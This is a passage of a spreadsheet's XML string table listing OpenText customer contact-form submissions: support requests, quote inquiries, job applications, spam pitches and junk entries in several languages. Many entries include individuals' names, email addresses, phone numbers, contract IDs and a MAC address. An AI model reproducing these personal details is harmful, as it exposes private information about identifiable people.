wir stehen in unserem Haus von einer Herausforderung in Form von einem Wechsel des Email-Systems. Wir werden von Exchange 2013 On-Prem zu Office 365 in einem neuen AD wechseln. Die Herausforderung besteht in der Mitnahme der archivierten Emails. Unsere aktuellen Postfächer sind nur 2GB groß und beinhalten größtenteils Livelinks. Wir können aber unsere Postfächer vor der Migration nicht entarchivieren, da der Platz in den Mailboxen fehlt. _x000D_
Der aktuelle Plan ist, die Postfächer in PST-Dateien zu entleeren und diese Dateien im neuen Email-System einzulesen. Hier werden aber die Livelinks nicht funktionieren._x000D_
Ab hier benötigen wir Ihre Unterstützung. Vielleicht haben Sie für diese geplante Migration auch einen ganz anderen Lösungs-Ansatz, wie wir die Emails entarchiviert in das neue System bringen können._x000D_
Ich bitte Sie, so schnell wie möglich mit mir Kontakt aufzunehmen, damit wir die Möglichkeiten absprechen können._x000D_
Viele Grüße, Olaf Schuppe</t>
  </si>
  <si>
    <t>Hi, good afternoon._x000D_
_x000D_
My company uses ICC 7.5, which according to your documentation, requires SQL Server 2008R2 or 2012. We are planning to migrate the databases to SQL Server 2017, we we would like to know if that would be possible configuring the database compatibility mode to "2008R2"?_x000D_
_x000D_
_x000D_
Best Regards,_x000D_
Rui</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
Could do you give me more information of a product to pdf generate?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Unable to download Documentum &amp; Captiva Software from OpenText Support Site. Can you please resolve this issue as soon as possible. We are in process of upgrade to latest version. Please do the needful.</t>
  </si>
  <si>
    <t>KR</t>
  </si>
  <si>
    <t xml:space="preserve">More than 48 hours was passed after account creation. Training Central access is not shown yet in Account Setting page of DAESIK KIM. </t>
  </si>
  <si>
    <t>MY</t>
  </si>
  <si>
    <t>I would like to access the support for some information on the usage of OpenText Streamserve</t>
  </si>
  <si>
    <t>We can't  access Ticket &amp; account to try the activate product see attach below :_x000D_
_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
Request confirmation email_x000D_
_x000D_
thanks n regards,</t>
  </si>
  <si>
    <t>Chubb &amp; Son was Sold. My wife had a stable job. Wife and I had two Younger Children as I  became a stay at home Dad. The children are now older and I am ready to work at your company. I welcome an interview to communicate my skill sets and how I am eager and would be valuable to your company.  I have been fixing and upgrading  computers from home.   I’m  considering. Leaving the Information Technology field. Land a career in the Administration or  Marketing  departments of the company.  I have experience dealing with vendors. Both Leasing and buying  Cisco , IBM and Information Technology Equipment for Network Connectivity. I became a stay at home Dad. The children are now older and I am ready to work at your company. I welcome an interview to communicate my skill sets and how I am eager and would be valuable to your company.  I have been fixing and upgrading  computers from home. Im Considering leaving the Information Technology field. Land a career in the Administration or  Marketing  departments of the company.  I have experience dealing with vendors. Both Leasing and buying  Cisco , IBM and Information Technology Equipment for Network Connectivity. DURING THE 911 DISASTER. I Was working for Prudential Securities.  3 Blocks away From the World Trade Center. I came back to work the following day.  Worked Long Hours including overnight. To ensure the Data Center was fully operational for the opening bell of Trading Segments at Stock Exchanges. Ensured uptime for Prudential Locations throughout the United States..  Created spread sheets showing which sites were up on Primary VPN Circuits and back up . The Spread sheets were able to be viewed by essential Personnel at various remote locations.  I am mentioning this . As A demonstration to show if I were working as Techniciam, administrator  or Performing Marketing weather sales or other areas of Marketing.  I would get the Job done.  I ensure optimal uptime performance. AS performed during the occurrence of 911…If ne</t>
  </si>
  <si>
    <t>sds ssffsdfsdsdfs sdfsdfsfsf</t>
  </si>
  <si>
    <t>Looking to setup a phone call to discuss an opportunity for a customer out in Oregon.  Please call or email with information on how to move ahead._x000D_
_x000D_
Thanks!_x000D_
_x000D_
DK</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a version of Brava that allows you to add figures or text to a tiff drawing file?_x000D_
My work desktop has Brava Desktop SX Build: 16.3.0246 currently installed._x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I got a email from you I supplied you with a credit card up date._x000D_
Please confirm </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking for an Enterprise Search Engine for our agency.  Please contact me to discuss</t>
  </si>
  <si>
    <t>_x000D_
Hello,_x000D_
_x000D_
_x000D_
Please kindly provide formal quote for items below._x000D_
_x000D_
_x000D_
1... Cisco Catalyst 2960X-24TS-L 24-port Ethernet Managed Mountable..._x000D_
_x000D_
_x000D_
2... Seagate Barracuda STBD2000101 2TB 3.5" Internal Hard Drive_x000D_
_x000D_
_x000D_
3... Western Digital My Book Essential 1TB USB 2.0 External Hard Drive_x000D_
_x000D_
Awaiting your response and looking forward to a long term association _x000D_
with you._x000D_
_x000D_
Thank you_x000D_
_x000D_
DENNIS J. MADDEN, SVP, GSM_x000D_
AMALIE OIL COMPANY._x000D_
1601 McCloskey Blvd, Tampa, FL 33605_x000D_
Tel:813-258-0929_x000D_
Fax:813-258-0930</t>
  </si>
  <si>
    <t>We are an Infor M3 customer, we are trying to use Stream Serve Story Teller.   do we need to get a license from you guys?   we where told that Our License from Infor Includes this.   but We need to get the Actual license from you.   _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Would you be interested in recently compiled and updated data file of Geospatial Professionals?_x000D_
 _x000D_
You could use the database for Email Marketing, Tele marketing and Direct Marketing initiatives. _x000D_
_x000D_
Data fields: Email Address, Direct Dials, Company Name, Contact Name, Phone Number, Fax Number, Titles, Industry SIC codes etc._x000D_
_x000D_
Let me know if you’re interested in seeing few samples and I will send you complete information._x000D_
_x000D_
Look forward to your response._x000D_
 _x000D_
Regards,_x000D_
Erica Tyler_x000D_
Marketing Associate | Sun Micro Hub _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
 _x000D_
I wanted to reach out regarding your printed materials &amp; more. I know as you expand operations and grow as a company, it can be a little tricky to manage a variety of vendors for your t-shirts/hoodies, marketing collateral/swag, office/event signage, etc… So that’s why we do it all! Let me be your one-stop-shop for everything with your logo on it!  _x000D_
Thank you,_x000D_
Stephen Chen_x000D_
Sales &amp; Marketing_x000D_
Copymat Digibranch_x000D_
(415)981-1300_x000D_
</t>
  </si>
  <si>
    <t>Hallo,_x000D_
Bei einem Laptop mit WLAN lief alles einwandfrei. Bis ich einen UPDATE Installiert hatte._x000D_
WLAN ging nach dem Update nicht mehr._x000D_
Das ist der 3. Fehler bei einem Microsoft Update. (19 PC´s in der Wartung)_x000D_
Microsoft Updates sind in Zukunft mit Vorsicht zu geniesen, ein Immage vor einem_x000D_
Update ist Pflicht._x000D_
Das "Gute" das man einen Update bedenkenlos installieren konnte war mal.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello OpenText Sales,_x000D_
I am looking for a reseller quote for the products below:_x000D_
1) Exceed 2008 part # EXMPI550701M0000Z_x000D_
Qty - 100_x000D_
2) Connectivity Secure Shell 2008 part # SPMPI570701M0000Z_x000D_
Qty - 100_x000D_
The customer is the State of Illinois._x000D_
If you have any questions, please let me know._x000D_
Thanks,_x000D_
Suba Elangovan_x000D_
Savvy Technology Solutions, LLC_x000D_
suba@savvy-ts.com_x000D_
630-386-1368_x000D_
</t>
  </si>
  <si>
    <t>I have registered to open text support using "prabhushankar.chetty@thermofisher.com"_x000D_
and I don't have access to the below site to raise SR_x000D_
Thermo Fisher Scientific Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">I need service account to be setup correctly for entitled OpenText customer support access.  Here is the information:_x000D_
products: Process Suite/AppWorks, Content Suite/Server and OTDS_x000D_
Process Suite: Customer ID: 10035651, Entitlement Group: EU0008507, Support Contract #: 0012225446_x000D_
Content Server: EU0313237, Support Contract #: A188505_x000D_
Contact: Venky Mahalingam_x000D_
Contact Phone: 703-835-6107_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Would like to request access to the customer support portal as well as any places to obtain the latest installation files, or updates.  We (NIAID\NIH) recently upgraded to version 8 with the assistance of OpenText employee, Jason Rogers in case there are any questions. Thank you!</t>
  </si>
  <si>
    <t>Team - Will someone please send me a 2018 Section 508 VPATs for OpenText products for Business Process and for Documentum and Captiva.  Thank you.</t>
  </si>
  <si>
    <t>Prezados,_x000D_
_x000D_
Estamos em busca de uma plataforma de ECM que atenda à múltiplos departamentos da empresa e que possa ser integrada à outras aplicações._x000D_
Li o conteúdo disponível no site e gostaria de maiores detalhes sobre a solução._x000D_
_x000D_
att.</t>
  </si>
  <si>
    <t>AT</t>
  </si>
  <si>
    <t>I need to access the downloads for Encase forensics. I have three dongles at PwC Austria. Since the download portal moved to Opentext I can not download anymore. Now I am already waiting for a week to get access.</t>
  </si>
  <si>
    <t>Looking for Content Publishing platform from PLM Windchill to Field Service engineers. These are service manuals, creo illustrations, 3D/2D contents which need to be published and distributed to service engineers, partners, dealers, customers</t>
  </si>
  <si>
    <t>Hi, please can you contact me, my company - Orion - is interested in Documentum and we'd like to know how it's priced, install options and requirements and can we buy it direct from yourselves or via an integrator?_x000D_
Hope to hear from you soon,_x000D_
Much appreciated,_x000D_
Kath Murray_x000D_
OCCMS_x000D_
21 Albert Street, Aberdeen, AB25 1XX_x000D_
t. +44 (0) 1224 336221</t>
  </si>
  <si>
    <t>We have a customer that has an old version of Report Builder (2005.1 and 6.0).  The original 6.0 install files were lost long ago, and the files were available on Gupta Technologies's site; however, the links are no longer valid.  Is there a way we can get the download for version 6.0.  If not, what are our options to modify these old reports?</t>
  </si>
  <si>
    <t>Hello, _x000D_
I inquiring about the IR250 - Incident Investigation course offered in Washington DC.Under the pricing section, I see there is an extra fee for instructor travel expenses. How much do these additional charges usually run around after the initial $3,195.00?</t>
  </si>
  <si>
    <t>When I try a manual FTP to your Easylink service, I am not able to connect and authenticate. _x000D_
_x000D_
 _x000D_
However, I am able to connect to Pubnet and authenticate.  _x000D_
_x000D_
Please create a support ticket and use my contact information below to let me know the best way to contact support.  _x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Cathy Peach_x000D_
Online Technical Services_x000D_
MBS Textbook Exchange, LLC  _x000D_
Phone:  1-866-638-5948  Option 7, Option 7_x000D_
Fax: 573-446-5249</t>
  </si>
  <si>
    <t>Could you tell me the license fee for Extra X-Treme?_x000D_
Is the license charged per installation or per package?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to know what protocols is supported by Global 360? I can't find the information._x000D_
Many thanks in advance for your help._x000D_
Best regards._x000D_
Stephane</t>
  </si>
  <si>
    <t>Good Morning:_x000D_
I need to email New Vendor Forms to your company to be filled out. We received an invoice from Opentext to be paid, but because your company is not set up in our system with a vendor no., in order to pay the invoice, I need to email the forms._x000D_
Could you please email me an email address I should send them to?_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
We are GSA Contractor and looking  for a price quote for a Federal opportunity  "Content Suite Platform " for US Department of Navy. It is requested to please contact  me on my email zia@itechdevices.com so i may share complete RFQ detail._x000D_
RFQ Closing time Mar 31, 2019 12:00 pm Eastern. </t>
  </si>
  <si>
    <t>Hello, I work for Consolidated Communications and we acquired a company called Fairpoint.  I believe they used your software, and we had a few questions about it.  I was wondering if we had any support with you still, of if someone might be able to assist._x000D_
_x000D_
Thank you_x000D_
Dennis</t>
  </si>
  <si>
    <t xml:space="preserve">Hi  Team,_x000D_
_x000D_
We are from Accenture. We want to download ICC 7.5 version for my client business._x000D_
When I am trying to register it was giving information  my email ID neraja.pakala@accenture.com is already registered. When I tried to change my password using forgot password through Password reset LINK which I have received to my recovery email id I am getting error Password update got failed and error in password Update._x000D_
Could you please help us to resolve the issue._x000D_
_x000D_
Thanks _x000D_
Neeraja_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Searching for better opportunity with your esteemed organization</t>
  </si>
  <si>
    <t>Can you please let me know who my sales representative is? It used to be Michael Murphy.</t>
  </si>
  <si>
    <t>Looking for job change.</t>
  </si>
  <si>
    <t>Need help upgrading rightfax from 10.6 to 16</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Rahmen unseren täglichen Arbeit an verschiedenen Projekten sind wir auf der Suche nach einer für uns geeigneten Low-Code-Plattform._x000D_
Unsere IT-Firma besteht aus ca. 700 Mitarbeitern und wir betreuen um die 17000 Anwender._x000D_
Bei unserer Markterkundung legen wir auf folgende Punkte wert._x000D_
_x000D_
•	Preisleistung_x000D_
•	Funktionen und Angebote_x000D_
•	Schnittstellen_x000D_
•	Designe der Benutzeroberfläche_x000D_
•	Cloud Plattformen_x000D_
•	Programmiersprachen_x000D_
_x000D_
Wir würden uns sehr über verschiedene Information von Ihnen freuen._x000D_
Könnten Sie uns bitte diverse Informationen zu diesem Thema senden?_x000D_
_x000D_
Vorab vielen Dank!_x000D_
_x000D_
_x000D_
Freundliche Grüße_x000D_
_x000D_
Katharina-Marie Schäck_x000D_
_x000D_
kubus IT_x000D_
_x000D_
Sternplatz 7_x000D_
01067 Dresden_x000D_
Tel:	0351 4946-11711_x000D_
Fax:	0800 2471002-436_x000D_
_x000D_
_x000D_
kubus IT, Gesellschaft bürgerlichen Rechts, Karl-Marx-Str. 7a, 95444 Bayreuth_x000D_
Geschäftsführer: Thomas Kay, André Rentsch _x000D_
</t>
  </si>
  <si>
    <t>AC</t>
  </si>
  <si>
    <t>I would recommend FDIC ali my Banks i am the chairman for Sheild</t>
  </si>
  <si>
    <t>Urgent for IT Advisory Partnership: Updating the MIS for compliance with the Laws enforceable from January 2019//_x000D_
_x000D_
_x000D_
In order to agree on the terms of an IT consulting contract, please tell me if you are interested in representing us in your markets around the world to collaborate with Lelecorp as part of its partnership with ISACA and the EU-US group of 6 universities to support CIOs to update their Management Information System (MIS)._x000D_
_x000D_
Object:_x000D_
Solving the so-called "CFO Puzzle from 2019 with 100% LCR":_x000D_
The laws of the investor relationship (IR) adjusted to be in force from January 2019 base the WCR, the liquidity risk and the LCR on the balance sheet (cross-cutting) capacity of the MIS of banks and risk counterparties (SMEs and Large accounts) to rely on their remunerated HR assets for a distinct financial performance related to fixed salaries and variable salaries to process and deliver, given the risk appetite threshold, the free cash flow or cash surplus data reinforcing the customer deposits for High Quality Liquid Asset (HQLA). _x000D_
_x000D_
The Chair of the Accounting Department of the University of San Francisco and the R &amp; D of Lelecorp, the designer of Fintech HR, also called IT-IRM (Investor Relationship Management), have worked with ISACA (the global audit association IT), 3 universities in the European Union and 2 other US universities to make available to CIOs of banks and companies (SMEs and large accounts) of the ISACA global network of 180 countries, the brochure of the dynamics of cross-cutting interactions workstations required by law and 90% of employers worldwide. _x000D_
_x000D_
Let me know how to email you the document.</t>
  </si>
  <si>
    <t>Dear sir/madam, _x000D_
_x000D_
I'm doing an analysis and inventory of potential collaboration solutions for a client. Since Opentext is an interesting solution that seems to align with many requirements of my client, I have a list of user requirements that I'd like to have filled in by someone from Opentext._x000D_
_x000D_
Kind regards,_x000D_
Nick Oostervink</t>
  </si>
  <si>
    <t>Learn Enterprise Content Management (ECM)</t>
  </si>
  <si>
    <t>I am an employee at ING and work with Captiva. I want to read some patchnotes but I don't yet have access to the knowledge website which my colleague has</t>
  </si>
  <si>
    <t>RU</t>
  </si>
  <si>
    <t>Hello. In document "Installing BIRT Spreadsheet Engine and API" in part "Working with OpenText licensing" told:_x000D_
Without a license, you can only use the BIRT Spreadsheet API to access Microsoft Excel workbooks._x000D_
_x000D_
Is it mean, that I can take "essd11.jar" and use it in my project for working with Microsoft Excel workbooks?</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for updates or upgrades to opentext exceed, essentially those concerning security vulnerabilities. Where can we find this so that we can download to stay updated? </t>
  </si>
  <si>
    <t>Our customer (Kennametal) is having difficulty in printing from OpenText Dazel application to our MFP device (model: bizhub 227). The OpenText support contact of the customer (Subramani Sekar - ssekar@opentext.com) has advised for reaching out to OpenYext "Professional Services" team to create a new Dazel template for the bizhub 227 as currently it is not listed and the template other Konica Minolyta models listed do not produce any result. Please advise how we can get the new OpenText Dazel template created for our model bizhub 227.</t>
  </si>
  <si>
    <t>All</t>
  </si>
  <si>
    <t>Hi. We use Team Developer, and we use SalReportPrintToFile function to convert QRP reports to PDF format. We're experiencing an issue with this function: it works fine in our developement machines, but it has an erratic behaviour in our customers' machines: basically, sometimes it works and sometimes it doesn't. We find no pattern to when it works and when it doesn't. The result is that it always creates a file, but sometimes the file has 0 bytes. We get an error message as follows:_x000D_
EndDocument: Failed to create PDF document (title of the message window)_x000D_
Exception:_x000D_
Messasge File is not valid XPS file_x000D_
Conditional expression: fileSize &gt; 0_x000D_
Filename: ZipFile.cpp_x000D_
_x000D_
I don't know if we have a support account, but this issue (or similar to this) has been going on at least since version 6.2. We would greatly appreciate it if you can provide a solution._x000D_
_x000D_
Thanks in advance for your help.</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
wir wären an einer Online Demo zu Extended ECM auf Basis SharePoint Online interessiert._x000D_
Bitte kontaktieren Sie mich zwecks Terminvereinabrung._x000D_
_x000D_
Danke &amp; Grüße_x000D_
_x000D_
Walter G. Kummer</t>
  </si>
  <si>
    <t>PL</t>
  </si>
  <si>
    <t>One of our computer is broken. We need to move license from this computer to the new one, and we need new activation key for this new computer.</t>
  </si>
  <si>
    <t>LV</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
_x000D_
We are planning a large - 4000 respondent survey and we are looking for not-manual data entry solution. It is expected that 90-100% of the survey will be multiple-choice questions. What product can you advise for this purpose?_x000D_
_x000D_
Best regards,_x000D_
Marija_x000D_
</t>
  </si>
  <si>
    <t>Vendor: OpenText _x000D_
Product: Template Workspaces_x000D_
Version 16.2.4_x000D_
_x000D_
please let know if you there any patches to the version 16.2.4 if so please provide the patch and release date of it.</t>
  </si>
  <si>
    <t>Hi, I am working with Host Explorer and trying to integrate it with Pega Robotics for a major banking client. _x000D_
So, to set the emulator up inside Pega I need the argument path (which is basically a session which we save with our desired settings). I would be glad if you can help me regarding this.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like documentation for TDPX6 (SAS) for a OTAN codification._x000D_
Can you inform me if this article is still manufactured and if it is possible to buy it._x000D_
Thanks for answer._x000D_
(you don't phone me, because i dont speak English)._x000D_
Regard's</t>
  </si>
  <si>
    <t xml:space="preserve">Any ability to add Digital Signature via providers like Docusign using Opentext Streamserve ver 5.6 (32bit) in Design Center. If can, appreciate your help to provide guideline and step by step to do this. Thanks. </t>
  </si>
  <si>
    <t>We need help in partnering for SAP Hana technology. We have multiple opportunities for Native Hana roles. Kindly get in touch with us for more details.</t>
  </si>
  <si>
    <t>Can you send me event brochure?</t>
  </si>
  <si>
    <t>TR</t>
  </si>
  <si>
    <t>Hello,_x000D_
we'd like to use OpenText Brava features for one of our customer. But we need Brava to view files from Microsoft SharePoint 2016. Does it support SharePoint with all features. If so can you provide us licence fee for 80 users._x000D_
_x000D_
Regards,_x000D_
Mehmet</t>
  </si>
  <si>
    <t>Hi, We are developing an universal file viewer in Web browser. Is there any option to integrate your viewer software in our website/software? If Yes, please send the development documents and supported  develpoment platforms.</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
We would like to update current Open Text license version 14 to version 15._x000D_
We ordered current licenses in year 2010 from Finland but I can't find serial numbers._x000D_
_x000D_
What kind of solutions we have to update licenses?</t>
  </si>
  <si>
    <t>Necesito un Demo de eDocs, si tuviesen info en español seria genial._x000D_
_x000D_
Saludos.</t>
  </si>
  <si>
    <t>Hello - we're performing our annual due diligence and need copies of your most recent SOC reports. What is the best way to go about getting those?_x000D_
_x000D_
thank you,_x000D_
_x000D_
Nathan</t>
  </si>
  <si>
    <t>OM</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are implementing xECM, we would like to have an account to access OT support and Knowledge Center._x000D_
Adan</t>
  </si>
  <si>
    <t>KN</t>
  </si>
  <si>
    <t>HI</t>
  </si>
  <si>
    <t>Kindly help to verify whether the product IE Expedite MVS/Base  V4.6.1  is current and whether it has already an end-of-life or end-of-support announcement. If it has end-of-support or EOL  announced, what is the statement of direction or is there already an upgrade or new version release announcement. ? I am doing this routine annual check for Citigroup to ensure software version and support concurrency. Thanks.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I’m trying to apply for a vacancy you have but I am experiencing issues with gmail authentication. I am currently cannot access my Dropbox on this basis and there is no additional option for file upload._x000D_
_x000D_
Please advise on the best way to proceed._x000D_
_x000D_
Thanks in advance,_x000D_
Steph</t>
  </si>
  <si>
    <t>Good afternoon, I'm looking into an account with fax2mail and can't seem to find info anywhere regarding how to or what the costs are. if you can please help me with information on that, thanks!!</t>
  </si>
  <si>
    <t xml:space="preserve">I understand Keiser University purchased EnCase software sometime ago, I have a keyfob with me, what I don't know is if we have a service contract? and what should I do in order to access the software?_x000D_
_x000D_
Thanks </t>
  </si>
  <si>
    <t>Hi, my Headquarters purchased a training passport on my behalf last year. How do I sign up for a course using that training passport? For example, I would like to sign up for the Virtual Classroom attendance of the IR250 course beginning April 23, 2019. I look forward to hearing back from you. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">One of our users did not get a confirmation page. Can you help with this issue? _x000D_
_x000D_
Her name is Stacey Bowen _x000D_
Contact: (416) 366-3763 ext 240_x000D_
bowens@caleywray.com_x000D_
_x000D_
_x000D_
Please let us know how this can be resolved. </t>
  </si>
  <si>
    <t xml:space="preserve">Synchrony currently uses version 10.8 of Teleform and we would like to set up a call to discuss new features that would be included in the version 16.0. </t>
  </si>
  <si>
    <t>I work for SAP, I would like to know how I can get access to your knowledge materials in your support section.</t>
  </si>
  <si>
    <t>Hello, I would like to know if your BRMS is an standalone application? or it is needed to use it with a complete suite and BPM? _x000D_
Currently our implementations is based on .NET, so we are looking a BRMS that we can work with  with C# or through REST API._x000D_
If you can provide us with more information or giving more details will be great appreciate it._x000D_
Thank you._x000D_
Raciel Gutierrez</t>
  </si>
  <si>
    <t xml:space="preserve">Hi:_x000D_
_x000D_
I am a State Farm Agent that is transitioning to a Sales Leader role effective 4/1/19.  Please cancel my account for Ezlynx/fax2mail effective 4/1/19.  The credit card will also be cancelled in April as well._x000D_
_x000D_
Please confirm you received this message and have cancelled the account and will stop billing effective 4/1/19._x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>khaydaralikas9@mail.ru</t>
  </si>
  <si>
    <t>Good day. I have 7 zipped files (from 7 GB to over 45GB), when I extract the files locally vs when I view the file structure in EnCase v8.08, the NATIVE files count is very large (sometime more than 60,000 files more) than what is parsed and viewed in EnCase._x000D_
_x000D_
Need help understand why this happens, and how to fix the issue as soon as is possible?</t>
  </si>
  <si>
    <t>Our department needs a document management system which we can use to share documents with internal and external partners.  Looking for a demo as well as pricing.</t>
  </si>
  <si>
    <t>WI</t>
  </si>
  <si>
    <t>Can you direct me to where I can get the latest Opentext Gupta Object Nationalizer. I know 7.0.3 is out but not aware if that is the latest version.</t>
  </si>
  <si>
    <t xml:space="preserve">I need a sales contact for a customer in Turkey for the OpenText product. They used the free version from India, they are looking for an upgrade. _x000D_
They are in healthcare._x000D_
My company provides a video call platform._x000D_
ALEKS..._x000D_
</t>
  </si>
  <si>
    <t>VI</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Ciao! That is an amazing offers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Mailing is made in the same way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March 31.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FeedbackForm@make-success.com _x000D_
 _x000D_
It's time to finish. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>How do I request a Customer Service Record for our RightFax Connect account?  We have 18 fax lines with Opentext.</t>
  </si>
  <si>
    <t>I'm trying to get a demo that shows how your document management system works in a legal environment.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to find out where i can find information about security updates for the software Open Text Exceed 14 - 14.0.0. possibly some release notes to look at?_x000D_
</t>
  </si>
  <si>
    <t>TechnipFMC is already a Client of OpenText, We would like to have a better understand of Opentext products and see how they could help our Vessels Business</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, I'm reaching out on behalf of Blue Ant Media regarding our interest in OpenText's Media Asset Management product. If you can respond with specific contact information, we can discuss in greater detail. Thanks.   </t>
  </si>
  <si>
    <t>Dear OpenText Corporation,_x000D_
_x000D_
My name is Colin Kim, I am a 4th-year Psychology student from the University of Waterloo. I am currently working at the Organizational &amp; Human Development department as a human resources intern, and one of the projects that I'm working on is to develop an environmental scan on workplace health &amp; wellness practices for employees. _x000D_
_x000D_
I was looking for a reputable organization inside the KW region and was fortunate enough to find the OpenText Corporation, one of Canada's largest leading companies in software management services. I have also found that the OpenText Corporation has been recognized as one of Waterloo Area's Top Employer for 2019._x000D_
_x000D_
Our ask is for you to please take a 20-minute survey to answer a few questions about what you are doing to support Workplace Health &amp; Wellness in your organization. The information you provide through the survey will help inform us about opportunities we may be missing and what other initiatives we could take to enhance our programs, education, and awareness._x000D_
_x000D_
Please let me know if you're interested in taking the survey, I will send the survey link as soon as I get the response from you. _x000D_
_x000D_
Thank you for your consideration, hope you have a great day._x000D_
_x000D_
Sincerely,_x000D_
Colin</t>
  </si>
  <si>
    <t>Will you be offering the 3-0188 OpenText Content Server System Administrator v16.2 virtual training course in North America during 2019??  I don't see this in your schedule.  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to get a price quote for:_x000D_
Item #1 Three (3) weeks of professional service, to deploy Encase client to our enterprise, to use Encase for minimal forensic disk and memory capture for rapid incident response and investigations._x000D_
_x000D_
Item # 2  EnCE Certification Bootcamp for two (2) employees_x000D_
_x000D_
Item # 3 Two (2) Annual Training Passport_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am trying to download EnCase imager and can not get access to the download area. Can you please help?</t>
  </si>
  <si>
    <t>CCAP is going to be releasing a WCM RFP tomorrow. I need to know the contact to receive this announcement?</t>
  </si>
  <si>
    <t>I got a new computer and need to transfer this pin IGC462177 to my new computer.  My MAC address is 20-79-18-44-53-c6._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Recently our internal support team that handles installation of Actuate releases and problem resolution disbanded.  They turned over these efforts to the application team using the software. We are looking at the possibility of creating a Statement of Work with you that would provide for immediate help if issues are occurring or to install releases of the software that we get from a third party vendor.</t>
  </si>
  <si>
    <t>I wish to cancel my subscription immediately: thanks.</t>
  </si>
  <si>
    <t>Puis-je avoir quelqu'un assigné à mon billet 4120412 SVP?  L'agent actuel ne fait que m'envoyer des courriels pour planifier une "session", sans toutefois effectuer des progress dans ce billet.  De plus, il semble qu'il ne soit pas en phase avec le fuseau horaire de la ville de Ottawa._x000D_
_x000D_
Sinon, puis-je avoir un esitmé du temps d'attente avant d'obtenir des progress significatifs?_x000D_
_x000D_
Merci pour votre aide.</t>
  </si>
  <si>
    <t>Purchase Gupta Report Builder - Version 7</t>
  </si>
  <si>
    <t>I have forgotten my password for the support account and when trying to setup a new password using the password reset link the website responds with either - "Update password failed" or "An error occurred updating password"._x000D_
_x000D_
How do I reset my password?</t>
  </si>
  <si>
    <t>yh lop;</t>
  </si>
  <si>
    <t>Hi,_x000D_
I try to access demo ressources and have been guided to the following link, but it looks my account is not eligible for access._x000D_
My contact at opentext is Nicole Webers. _x000D_
_x000D_
Thank you_x000D_
_x000D_
Marcus</t>
  </si>
  <si>
    <t>Hello. Our company currently uses OpenText Fax2Mail and I'm looking to get documentation stating that this method of faxing is HIPAA compliant. How do I go about obtaining this documentation?_x000D_
_x000D_
Thanks_x000D_
Ben Martin</t>
  </si>
  <si>
    <t>We are looking to migrate from Server 2008 R2 / SQL 2008 R2 to Server 2016 / SQL 2017.  The DM16.4 will remain the same.  We will have both the Server 2016 / SQL 2017 up and ready on our own.  We just need help with the cut over and test.  Can we get a quote for assistance with this migration?  If you refer to a 3rd party, please exclude Live Wire Technology.  Thanks.</t>
  </si>
  <si>
    <t>How can I download Exceed and Secure Shell for an end user.  I already have a license for both.  I am the IT person that will install the software for them.  I created an account already but everything leads to a trial version or buy.  Thank you._x000D_
_x000D_
David Kalbfell</t>
  </si>
  <si>
    <t>I tried changing email to my gmail, got an error please change to marcusmadej@gmail.com</t>
  </si>
  <si>
    <t>I need to grant CDW-G account manager, Jeff Jones, to be able to get quotes on the behalf of MSD. Please let me know what I need to provide to get this relationship completed.</t>
  </si>
  <si>
    <t>Legacy Documentum client. Inquiry regarding software enhancements, Open Text demo, and integration with Oracle for payments.</t>
  </si>
  <si>
    <t>I want to access payment history and review and manage invoices.  After I sign on and I try to "Manage Account" the error message "Server error" comes up.  Is this the correct platform to view these things?</t>
  </si>
  <si>
    <t>My EnCE certification number is: 15-0809-3169 - am I up for renewal this year? Please advise it looks like my last renewal was 06/16/16</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking into enterprise content management systems with the general requirements. I would like to schedule a phone call to discuss OpenText solutions._x000D_
Thank you_x000D_
_x000D_
_x000D_
Solutions should include:_x000D_
•	Automation (Process acceleration based on Wintrust polices)_x000D_
•	Security (risk mitigation including data loss prevention)_x000D_
•	Support multiple data types_x000D_
•	Interfaces and integrations to multiple systems _x000D_
•	Document lifecycle management_x000D_
•	eDiscovery_x000D_
•	Version control_x000D_
•	Document governance_x000D_
•	Optical Character Reading (OCR)_x000D_
•	Well designed and easy to use interface_x000D_
Additional capabilities to consider:_x000D_
•	Analytics (Insights and innovation)_x000D_
•	Real-usability (not just archive and retrieve)_x000D_
•	Collaboration support_x000D_
•	Transactional content management (back office integrations)_x000D_
</t>
  </si>
  <si>
